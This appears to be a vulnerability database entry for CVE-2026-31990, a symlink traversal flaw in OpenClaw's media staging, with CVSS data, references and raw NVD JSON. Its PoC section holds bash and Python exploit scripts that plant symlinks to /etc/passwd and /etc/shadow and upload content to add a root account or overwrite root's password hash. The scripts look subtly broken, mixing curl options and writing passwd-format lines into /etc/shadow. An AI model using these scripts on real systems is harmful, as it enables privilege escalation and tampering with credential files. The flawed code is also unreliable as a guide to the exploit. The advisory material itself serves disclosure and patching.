Security Vulnerability Report
CVE-2026-31990 CVSS 6.1 MEDIUM

Published: 2026-03-19 02:16:04
Last Modified: 2026-03-19 19:16:08

Description

OpenClaw versions prior to 2026.3.2 contain a vulnerability in the stageSandboxMedia function in which it fails to validate destination symlinks during media staging, allowing writes to follow symlinks outside the sandbox workspace. Attackers can exploit this by placing symlinks in the media/inbound directory to overwrite arbitrary files on the host system outside sandbox boundaries.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2026-31990 PoC - OpenClaw Symlink Traversal
# Target: OpenClaw < 2026.3.2

TARGET_HOST="target-vulnerable-server"
MEDIA_DIR="/opt/openclaw/media/inbound"

# Create a symlink in the media inbound directory
# This symlink points to a file outside the sandbox
ln -sf /etc/passwd ${MEDIA_DIR}/malicious_link

# Upload a file with content that will be written through the symlink
# The file name must match the symlink name
curl -X POST -d "attacker:0:0:::/bin/bash:/bin/sh" \
  "http://${TARGET_HOST}/media/upload" \
  -F "filename=malicious_link"

echo "PoC executed. Check if /etc/passwd was modified."

python
# Python PoC alternative
import requests
import os

target = "http://vulnerable-server:8080"
media_dir = "/opt/openclaw/media/inbound"

# Step 1: Create symlink pointing to system file
symlink_path = os.path.join(media_dir, "config_override")
os.symlink("/etc/shadow", symlink_path)

# Step 2: Upload malicious content
files = {
    'file': ('config_override', b'root:attacker_hash:0:0:root:/root:/bin/bash\n')
}
response = requests.post(f"{target}/api/media/stage", files=files)
print(f"Status: {response.status_code}")
print("If successful, /etc/shadow has been modified")

References

https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a (Patch)
https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c (Mitigation, Vendor Advisory)
https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination (Third Party Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-31990",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-19T02:16:03.647",
    "lastModified": "2026-03-19T19:16:08.117",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenClaw versions prior to 2026.3.2 contain a vulnerability in the stageSandboxMedia function in which it fails to validate destination symlinks during media staging, allowing writes to follow symlinks outside the sandbox workspace. Attackers can exploit this by placing symlinks in the media/inbound directory to overwrite arbitrary files on the host system outside sandbox boundaries."
      },
      {
        "lang": "es",
        "value": "Las versiones de OpenClaw anteriores a la 2026.3.2 contienen una vulnerabilidad en la función stageSandboxMedia en la que no valida los enlaces simbólicos de destino durante la preparación de medios, permitiendo que las escrituras sigan enlaces simbólicos fuera del espacio de trabajo de la sandbox. Los atacantes pueden explotar esto colocando enlaces simbólicos en el directorio media/inbound para sobrescribir archivos arbitrarios en el sistema anfitrión fuera de los límites de la sandbox."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 4.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-59"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "2026.3.2",
                "matchCriteriaId": "986EEC6C-F9E4-4B22-96D5-BBB98A4A738D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c",
        "source": "[email protected]",
        "tags": ["Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}